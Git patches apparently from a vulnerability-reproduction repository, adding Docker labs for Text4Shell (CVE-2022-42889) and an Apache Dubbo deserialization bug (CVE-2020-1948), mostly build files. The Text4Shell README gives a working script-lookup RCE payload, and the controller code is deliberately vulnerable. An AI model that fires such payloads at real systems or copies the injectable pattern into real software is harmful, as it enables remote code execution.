From 36b608033f3978f222e51fe009712b2d1bfd77e0 Mon Sep 17 00:00:00 2001 From: GQ246 Date: Thu, 23 Mar 2023 13:23:03 +0000 Subject: [PATCH 1/8] add cve-2022-42889 Signed-off-by: GQ246 --- cve/docker/2022/cve-2022-42889/Dockerfile | 18 ++++++ cve/docker/2022/cve-2022-42889/README.md | 61 +++++++++++++++++++ cve/docker/2022/cve-2022-42889/pom.xml | 46 ++++++++++++++ .../com/levo/dockerexample/DockerApp.java | 11 ++++ .../controller/HelloController.java | 30 +++++++++ .../dockerexample/PlaceHolderForTest.java | 5 ++ 6 files changed, 171 insertions(+) create mode 100644 cve/docker/2022/cve-2022-42889/Dockerfile create mode 100644 cve/docker/2022/cve-2022-42889/README.md create mode 100644 cve/docker/2022/cve-2022-42889/pom.xml create mode 100644 cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java create mode 100644 cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java create mode 100644 cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java diff --git a/cve/docker/2022/cve-2022-42889/Dockerfile b/cve/docker/2022/cve-2022-42889/Dockerfile new file mode 100644 index 00000000..a31999b9 --- /dev/null +++ b/cve/docker/2022/cve-2022-42889/Dockerfile @@ -0,0 +1,18 @@ +# Use an official OpenJDK runtime as a parent image +FROM openjdk:8-jre-alpine + +# set shell to bash +# source: https://stackoverflow.com/a/40944512/3128926 +RUN apk update && apk add bash + +# Set the working directory to /app +WORKDIR /app + +# Copy the fat jar into the container at /app +COPY /target/text4shell-poc.jar /app + +# Make port 8080 available to the world outside this container +EXPOSE 8080 + +# Run jar file when the container launches +CMD ["java", "-jar", "text4shell-poc.jar"] \ No newline at end of file diff --git a/cve/docker/2022/cve-2022-42889/README.md b/cve/docker/2022/cve-2022-42889/README.md new file mode 100644 index 00000000..2452d91e --- /dev/null +++ b/cve/docker/2022/cve-2022-42889/README.md @@ -0,0 +1,61 @@ +### Install maven - [maven-linux](https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu) +------------- + + +1. Maven install to create the fat jar + +``` +mvn clean install +``` + +2. Docker build + +``` +docker build --tag=text4shell . +``` + +3. Docker run + +``` +docker run -p 80:8080 text4shell +``` + +4. Test the app + +``` +http://localhost/text4shell/attack?search= +``` + +5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup: + +``` +${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} +``` + +http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D + +6. You can also try using `dns` or `url` prefixes. + +7. Get the container id + +``` +docker container ls +``` + +8. Get into the app + +``` +docker exec -it bash +``` + +9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory): + +``` +ls /tmp/ +``` + +10. To stop the container + +``` +docker container stop +``` \ No newline at end of file diff --git a/cve/docker/2022/cve-2022-42889/pom.xml b/cve/docker/2022/cve-2022-42889/pom.xml new file mode 100644 index 00000000..80084258 --- /dev/null +++ b/cve/docker/2022/cve-2022-42889/pom.xml @@ -0,0 +1,46 @@ + + 4.0.0 + com.levo.dockerexample + docker-java-app-example + jar + 1.0-SNAPSHOT + docker-java-app-example + http://maven.apache.org + + + UTF-8 + UTF-8 + 1.8 + com.levo.dockerexample.DockerApp + + + + org.springframework.boot + spring-boot-starter-parent + 2.1.1.RELEASE + + + + + org.springframework.boot + spring-boot-starter-web + + + org.apache.commons + commons-text + 1.8 + + + + + text4shell-poc + + + org.springframework.boot + spring-boot-maven-plugin + + + + + diff --git a/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java b/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java new file mode 100644 index 00000000..d1d037bf --- /dev/null +++ b/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java @@ -0,0 +1,11 @@ +package com.levo.dockerexample; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +@SpringBootApplication +public class DockerApp { + public static void main(String[] args) { + SpringApplication.run(DockerApp.class, args); + } +} diff --git a/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java b/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java new file mode 100644 index 00000000..b4fa1922 --- /dev/null +++ b/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java @@ -0,0 +1,30 @@ +package com.levo.dockerexample.controller; + +import java.util.Date; + +import org.apache.commons.text.StringSubstitutor; + +import org.springframework.web.bind.annotation.ResponseBody; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RequestMethod; +import org.springframework.web.bind.annotation.RequestParam; +import org.springframework.web.bind.annotation.RestController; + +@RestController +@RequestMapping("text4shell") +public class HelloController { + + @RequestMapping(value = "/attack", method = RequestMethod.GET) + @ResponseBody + public String attack(@RequestParam(defaultValue="5up3r541y4n") String search) { + StringSubstitutor interpolator = StringSubstitutor.createInterpolator(); + // String pocstring = "${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}"; + try{ + String pwn = interpolator.replace(search); + } catch(Exception e) { + System.out.println(e); + } + return "Search results for: " + search; + } + +} diff --git a/cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java b/cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java new file mode 100644 index 00000000..300beb32 --- /dev/null +++ b/cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java @@ -0,0 +1,5 @@ +package com.levo.dockerexample; + +public class PlaceHolderForTest { + +} -- Gitee From 81b16e7e935e53cee8e686c324b63bd8689d1ece Mon Sep 17 00:00:00 2001 From: GQ246 Date: Thu, 23 Mar 2023 13:29:06 +0000 Subject: [PATCH 2/8] add cve/docker/2022/yaml/cve-2022-42889.yaml. Signed-off-by: GQ246 --- cve/docker/2022/yaml/cve-2022-42889.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 cve/docker/2022/yaml/cve-2022-42889.yaml diff --git a/cve/docker/2022/yaml/cve-2022-42889.yaml b/cve/docker/2022/yaml/cve-2022-42889.yaml new file mode 100644 index 00000000..5672cca7 --- /dev/null +++ b/cve/docker/2022/yaml/cve-2022-42889.yaml @@ -0,0 +1,20 @@ +id: cve-2022-42889 +source: + https://github.com/karthikuj/cve-2022-42889-text4shell-docker +info: + name: Docker是美国Docker公司的一款开源的应用容器引擎。该产品支持在Linux系统上创建一个容器(轻量级虚拟机)并部署和运行应用程序,以及通过配置文件实现应用程序的自动化安装、部署和升级。 + severity: CRITICAL + description: | + Apache Commons Text执行变量插值,允许动态评估和扩展属性。插值的标准格式是“${prefix:name}”,其中“前缀”用于定位执行插值的org.apache.commons.text.lookup.StringLookup的实例。从版本 1.5 开始一直到 1.9,默认查找实例集包括可能导致任意代码执行或与远程服务器联系的插值器。这些查找是: - “脚本” - 使用 JVM 脚本执行引擎 (javax.script) 执行表达式 - “DNS” - 解析 DNS 记录 - “网址” - 从 URL 加载值,包括从远程服务器加载值 如果使用不受信任的配置值,则在受影响版本中使用插值默认值的应用程序可能容易受到远程代码执行或与远程服务器的意外联系。建议用户升级到Apache Commons Text 1.10.0,默认情况下禁用有问题的插值器。 + scope-of-influence: + Docker 1.5-1.10.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-42889 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: cve-2022-42889 + cwe-id: CWE-94 + cnvd-id: None + kve-id: None + tags: Docker,cve2022 \ No newline at end of file -- Gitee From 6f84130e9e9c9a755166bebc2f240590dc06ca19 Mon Sep 17 00:00:00 2001 From: GQ246 Date: Fri, 7 Apr 2023 15:54:12 +0000 Subject: [PATCH 3/8] add CVE-2020-1948 Signed-off-by: GQ246 --- .../2020/CVE-2020-1948/Dockerfile | 19 + cve/apache-Dubbo/2020/CVE-2020-1948/README.md | 73 +++ .../2020/CVE-2020-1948/docker-compose.yml | 9 + .../src/dubbo-spring-boot-parent/pom.xml | 459 ++++++++++++++++++ .../auto-configure-samples/pom.xml | 38 ++ .../provider-sample/pom.xml | 89 ++++ ...bboAutoConfigurationProviderBootstrap.java | 38 ++ .../provider/service/DefaultDemoService.java | 62 +++ .../src/main/resources/application.properties | 12 + .../src/dubbo-spring-boot-samples/pom.xml | 96 ++++ .../sample-api/pom.xml | 33 ++ .../boot/sample/consumer/DemoService.java | 28 ++ .../2020/CVE-2020-1948/src/pom.xml | 197 ++++++++ 13 files changed, 1153 insertions(+) create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/Dockerfile create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/README.md create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/docker-compose.yml create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-parent/pom.xml create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/pom.xml create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/bootstrap/DubboAutoConfigurationProviderBootstrap.java create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/service/DefaultDemoService.java create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/pom.xml create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/pom.xml create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/src/main/java/org/apache/dubbo/spring/boot/sample/consumer/DemoService.java create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/pom.xml diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/Dockerfile b/cve/apache-Dubbo/2020/CVE-2020-1948/Dockerfile new file mode 100644 index 00000000..59c3351c --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/Dockerfile @@ -0,0 +1,19 @@ +FROM maven:3.5-jdk-8 AS pre_jar + +COPY src/ /src/ + +WORKDIR /src/ + +RUN mvn package -DskipTests=true + +FROM szgx/java:8u111_debian + +LABEL maintainer="mO0n@guanxin" version="1.0" + +COPY --from=pre_jar --chown=0:0 /src/target/dubbo.jar /dubbo.jar + +WORKDIR / + +ENTRYPOINT ["bash", "-c", "java -jar /dubbo.jar"] + +EXPOSE 12345 \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/README.md b/cve/apache-Dubbo/2020/CVE-2020-1948/README.md new file mode 100644 index 00000000..f7e4fd14 --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/README.md @@ -0,0 +1,73 @@ +# Apache Dubbo CVE-2020-1948 测试环境 + +## 引子 + +在这个漏洞出现之初,为了验证该漏洞的危害,我们从互联网上搜寻了很多人整理的例子,发现没有一个能够顺利验证该漏洞,故自己搞了一个,放在这里供大家参考,欢迎交流! + +本环境基于 Apache Dubbo 官方示例环境改造而来,纠正了官方示例程序中几处编译中报错问题。例如: + +- 官方示例代码中应用的 DubboService 类,实际应该 Service。 + +## 编译 + +``` +cd src +mvn package +``` + +编译成功后会在 `src/target` 目录生成 `dubbo.jar` 文件。 + +## 运行 + +``` +java -jar target/dubbo.jar +``` + +运行成功后,监听 12345 端口,可以使用 `telnet` 命令连接测试。 + +``` +telnet x.x.x.x 12345 +# dubbo> ls -l +# PROVIDER: +# org.apache.dubbo.spring.boot.sample.consumer.DemoService:1.0.0 -> published: N +``` + +## 容器化 + +``` +# 构建 +docker build -t dsolab/dubbo:cve-2020-1948 . + +# 运行 +docker run -p 12345:12345 dsolab/dubbo:cve-2020-1948 -d +或 +docker-compose up -d + +# 访问 +telnet x.x.x.x 12345 +``` + +只想快速使用环境(懒得编译环境)的小朋友可以用下面的命令启动我们提供的镜像环境: + +``` +# 需要安装 Docker 和 docker-compose +docker-compose up -d +``` + +## 漏洞验证 + +参见 [Apache Dubbo CVE-2020-1948 反序列化漏洞验证方法](https://github.com/DSO-Lab/Dubbo-CVE-2020-1948/wiki) + +## 参考链接 + +- Dubbo Spring Boot Project + +https://github.com/apache/dubbo-spring-boot-project/ + +- Dubbo Pull Request + +https://github.com/apache/dubbo/pull/6374 + +- Dubbo Mail Archive + +https://www.mail-archive.com/dev@dubbo.apache.org/msg06544.html diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/docker-compose.yml b/cve/apache-Dubbo/2020/CVE-2020-1948/docker-compose.yml new file mode 100644 index 00000000..b0ff1ed7 --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/docker-compose.yml @@ -0,0 +1,9 @@ +version: "3" + +services: + api: + build: . + image: dsolab/dubbo:cve-2020-1948 + container_name: cve-2020-1948 + ports: + - "12345:12345" \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-parent/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-parent/pom.xml new file mode 100644 index 00000000..836b4700 --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-parent/pom.xml @@ -0,0 +1,459 @@ + + + + + org.apache.dubbo + dubbo-spring-boot-project + ${revision} + ../pom.xml + + + 4.0.0 + + dubbo-spring-boot-parent + pom + Apache Dubbo Spring Boot :: Parent + Apache Dubbo Spring Boot Parent + + + 1.8 + 1.8 + 1.8 + UTF-8 + UTF-8 + 2.3.0.RELEASE + ${revision} + + -server -Xms256m -Xmx512m -Dfile.encoding=UTF-8 -Djava.net.preferIPv4Stack=true + + + + + 3.0.2 + 3.6.0 + 3.0.1 + 0.8.2 + 1.5 + 0.12 + 2.5.3 + 2.19.1 + + + + + + + org.springframework.boot + spring-boot-dependencies + ${spring-boot.version} + pom + import + + + + + org.apache.dubbo + dubbo-dependencies-bom + ${dubbo.version} + pom + import + + + + org.apache.dubbo + dubbo + ${dubbo.version} + + + org.springframework + spring + + + javax.servlet + servlet-api + + + log4j + log4j + + + + + + + + + + + central + https://repo.maven.apache.org/maven2 + + false + + + + + apache.snapshots.https + Apache Development Snapshot Repository + https://repository.apache.org/content/repositories/snapshots + + false + + + true + + + + + spring-milestone + Spring Milestone + https://repo.spring.io/milestone + + false + + + + spring-snapshot + Spring Snapshot + https://repo.spring.io/snapshot + + true + + + + rabbit-milestone + Rabbit Milestone + https://dl.bintray.com/rabbitmq/maven-milestones + + false + + + + + + + central + https://repo.maven.apache.org/maven2 + + false + + + + spring-milestone + Spring Milestone + https://repo.spring.io/milestone + + false + + + + spring-snapshot + Spring Snapshot + https://repo.spring.io/snapshot + + true + + + + + + + + + src/main/resources/ + false + + + ../ + META-INF/ + false + + NOTICE + LICENSE + + + + + + org.apache.maven.plugins + maven-jar-plugin + ${maven-jar-plugin.version} + + + true + true + + true + true + + + ${project.version} + ${project.version} + + + + + + + org.apache.maven.plugins + maven-compiler-plugin + ${maven-compiler-plugin.version} + + true + ${java.source.version} + ${java.target.version} + ${project.build.sourceEncoding} + + + + + org.jacoco + jacoco-maven-plugin + ${maven-jacoco-plugin.version} + + + jacoco-initialize + + prepare-agent + + + jacocoArgLine + + + + jacoco-site + package + + report + + + + + + + org.apache.maven.plugins + maven-enforcer-plugin + + + enforce-rules + + enforce + + + + + [1.8,) + + + project.name + + + project.description + + + true + + + + + + org.apache.maven.plugins + maven-source-plugin + ${maven-source-plugin.version} + + + attach-sources + + jar-no-fork + + + + + + org.apache.maven.plugins + maven-surefire-plugin + ${maven-surefire-plugin.version} + + true + once + ${argline} ${jacocoArgLine} + + + + transporter + ${transporter} + + + serialization + ${serialization} + + + + port + ${port} + + + threadpool + ${threadpool} + + + threads + ${threads} + + + iothreads + ${iothreads} + + + + server + ${server} + + + timeout + ${timeout} + + + length + ${length} + + + connections + ${connections} + + + base + ${base} + + + concurrent + ${concurrent} + + + runs + ${runs} + + + onerror + ${onerror} + + + + + + org.apache.rat + apache-rat-plugin + ${apache-rat-plugin.version} + + + verify.rat + verify + + check + + + + **/*.versionsBackup + **/.idea/ + **/*.iml + **/*.txt + **/*.load + **/*.flex + **/*.fc + **/*.javascript + **/*.properties + **/*.yml + **/*.yaml + **/*.thrift + **/*.sh + **/*.bat + **/*.md + .git/ + .gitignore + + .repository/ + **/.settings/* + **/.classpath + **/.project + **/target/** + **/*.log + CODE_OF_CONDUCT.md + .codecov.yml + .travis.yml + PULL_REQUEST_TEMPLATE.md + CONTRIBUTING.md + README.md + README_CN.md + **/codestyle/* + **/resources/META-INF/** + **/*.factories + **/*.provides + **/*.properties + **/*.json + + + + + + + + org.apache.maven.plugins + maven-release-plugin + ${maven-release-plugin.version} + + true + false + release + deploy + ${arguments} + + + + + + + + + + spring-boot-2.0 + + 2.0.9.RELEASE + + + + + + spring-boot-2.1 + + 2.1.13.RELEASE + + + + + + spring-boot-2.2 + + 2.2.7.RELEASE + + + + + diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/pom.xml new file mode 100644 index 00000000..a4310f16 --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/pom.xml @@ -0,0 +1,38 @@ + + + + + org.apache.dubbo.samples + dubbo-spring-boot-samples + ${revision} + ../pom.xml + + 4.0.0 + + dubbo-spring-boot-auto-configure-samples + Apache Dubbo Spring Boot :: Samples :: Auto-Configure + Apache Dubbo Spring Boot Auto-Configure Samples + pom + + + provider-sample + + + \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml new file mode 100644 index 00000000..6150f021 --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml @@ -0,0 +1,89 @@ + + + + + org.apache.dubbo.samples + dubbo-spring-boot-auto-configure-samples + ${revision} + ../pom.xml + + 4.0.0 + + dubbo-spring-boot-auto-configure-provider-sample + Apache Dubbo Spring Boot :: Samples :: Auto-Configure :: Provider Sample + + + + + + org.springframework.boot + spring-boot-starter + + + + org.apache.dubbo + dubbo-spring-boot-starter + ${revision} + + + + org.apache.dubbo + dubbo-remoting-api + ${revision} + + + + org.apache.dubbo.samples + dubbo-spring-boot-sample-api + ${revision} + + + + com.rometools + rome + 1.7.0 + + + + + + + + org.springframework.boot + spring-boot-maven-plugin + ${spring-boot.version} + + + + repackage + + + + + false + dubbo + ${user.dir}/target + + + + + + + \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/bootstrap/DubboAutoConfigurationProviderBootstrap.java b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/bootstrap/DubboAutoConfigurationProviderBootstrap.java new file mode 100644 index 00000000..0c2c2392 --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/bootstrap/DubboAutoConfigurationProviderBootstrap.java @@ -0,0 +1,38 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package org.apache.dubbo.spring.boot.sample.provider.bootstrap; + +import org.apache.dubbo.spring.boot.sample.provider.service.DefaultDemoService; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.EnableAutoConfiguration; + +/** + * Dubbo Auto-Configuration Provider Bootstrap + * + * @see DefaultDemoService + * @since 2.7.0 + */ +@EnableAutoConfiguration +public class DubboAutoConfigurationProviderBootstrap { + + public static void main(String[] args) { +// new SpringApplicationBuilder(DubboAutoConfigurationProviderBootstrap.class) +// .run(args); + SpringApplication.run(DubboAutoConfigurationProviderBootstrap.class,args); + } +} diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/service/DefaultDemoService.java b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/service/DefaultDemoService.java new file mode 100644 index 00000000..91c8ea5d --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/service/DefaultDemoService.java @@ -0,0 +1,62 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package org.apache.dubbo.spring.boot.sample.provider.service; + +import org.apache.dubbo.config.annotation.Service; +import org.apache.dubbo.spring.boot.sample.consumer.DemoService; + +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; +import org.springframework.beans.factory.annotation.Value; + +import java.util.Random; + +/** + * Default {@link DemoService} + * + * @see DemoService + * @since 2.7.0 + */ +@Service(version = "1.0.0") +public class DefaultDemoService implements DemoService { + + private final Logger logger = LoggerFactory.getLogger(getClass()); + + private final Random costTimeRandom = new Random(); + + /** + * The default value of ${dubbo.application.name} is ${spring.application.name} + */ + @Value("${dubbo.application.name}") + private String serviceName; + + @Override + public String sayHello(String name) { + await(); + return String.format("[%s] : Hello, %s", serviceName, name); + } + + private void await() { + try { + long timeInMillisToWait = costTimeRandom.nextInt(500); + Thread.sleep(timeInMillisToWait); + logger.info("execution time : " + timeInMillisToWait + " ms."); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + } +} \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties new file mode 100644 index 00000000..db9e2dbf --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties @@ -0,0 +1,12 @@ +# Spring boot application +spring.application.name=dubbo-auto-configuration-provider-demo +# Base packages to scan Dubbo Component: @org.apache.dubbo.config.annotation.Service +dubbo.scan.base-packages=org.apache.dubbo.spring.boot.sample.provider.service +# Dubbo Application +## The default value of dubbo.application.name is ${spring.application.name} +## dubbo.application.name=${spring.application.name} +# Dubbo Protocol +dubbo.protocol.name=dubbo +dubbo.protocol.port=12345 +## Dubbo Registry +dubbo.registry.address=N/A \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/pom.xml new file mode 100644 index 00000000..72f28dee --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/pom.xml @@ -0,0 +1,96 @@ + + + + + org.apache.dubbo + dubbo-spring-boot-parent + ${revision} + ../dubbo-spring-boot-parent/pom.xml + + 4.0.0 + + org.apache.dubbo.samples + dubbo-spring-boot-samples + pom + Apache Dubbo Spring Boot :: Samples + Apache Dubbo Spring Boot :: Samples + + + sample-api + auto-configure-samples + + + + + + + org.apache.maven.plugins + maven-deploy-plugin + + true + + + + + + + + + + spring-boot-1.3 + + 1.3.8.RELEASE + + + + + + spring-boot-1.4 + + 1.4.7.RELEASE + + + + + + spring-boot-1.5 + + 1.5.21.RELEASE + + + + + + spring-boot-2.0 + + 2.0.9.RELEASE + + + + + + spring-boot-2.1 + + 2.1.13.RELEASE + + + + + \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/pom.xml new file mode 100644 index 00000000..bc73fab8 --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/pom.xml @@ -0,0 +1,33 @@ + + + + + org.apache.dubbo.samples + dubbo-spring-boot-samples + ${revision} + ../pom.xml + + 4.0.0 + + dubbo-spring-boot-sample-api + Apache Dubbo Spring Boot :: Samples :: API + Apache Dubbo Spring Boot Samples API + + \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/src/main/java/org/apache/dubbo/spring/boot/sample/consumer/DemoService.java b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/src/main/java/org/apache/dubbo/spring/boot/sample/consumer/DemoService.java new file mode 100644 index 00000000..398591b8 --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/src/main/java/org/apache/dubbo/spring/boot/sample/consumer/DemoService.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package org.apache.dubbo.spring.boot.sample.consumer; + +/** + * Demo Service interface + * + * @since 2.7.0 + */ +public interface DemoService { + + String sayHello(String name); + +} \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/pom.xml new file mode 100644 index 00000000..664fec48 --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/src/pom.xml @@ -0,0 +1,197 @@ + + + + 4.0.0 + + + org.apache + apache + 21 + + + org.apache.dubbo + dubbo-spring-boot-project + ${revision} + + pom + + Apache Dubbo Spring Boot Project + Apache Dubbo Spring Boot Project + https://github.com/apache/dubbo-spring-boot-project + + + 3.0.1 + 2.19.1 + 2.7.7 + + + + dubbo-spring-boot-parent + dubbo-spring-boot-samples + + + + The Apache Software Foundation + http://www.apache.org/ + + + + https://github.com/apache/dubbo-spring-boot-project + scm:git:git:////github.com/apache/dubbo-spring-boot-project.git + scm:git:ssh://git@//github.com/apache/dubbo-spring-boot-project.git + + + + + Github + https://github.com/apache/dubbo-spring-boot-project/issues + + + + + Development List + dev-subscribe@dubbo.apache.org + dev-unsubscribe@dubbo.apache.org + dev@dubbo.apache.org + + + Commits List + commits-subscribe@dubbo.apache.org + commits-unsubscribe@dubbo.apache.org + commits@dubbo.apache.org + + + Issues List + issues-subscribe@dubbo.apache.org + issues-unsubscribe@dubbo.apache.org + issues@dubbo.apache.org + + + + + Apache Dubbo + The Apache Dubbo Project Contributors + dev@dubbo.apache.org + http://dubbo.apache.org + + + + + + release + + + + org.apache.maven.plugins + maven-javadoc-plugin + 3.1.1 + + + package + + jar + + + + + + + org.apache.maven.plugins + maven-gpg-plugin + 1.6 + + + verify + + sign + + + + + + + org.codehaus.mojo + flatten-maven-plugin + 1.1.0 + + true + resolveCiFriendliesOnly + + + + flatten + process-resources + + flatten + + + + flatten.clean + clean + + clean + + + + + + + + + + + + + + org.codehaus.mojo + flatten-maven-plugin + 1.1.0 + + true + resolveCiFriendliesOnly + + + + flatten 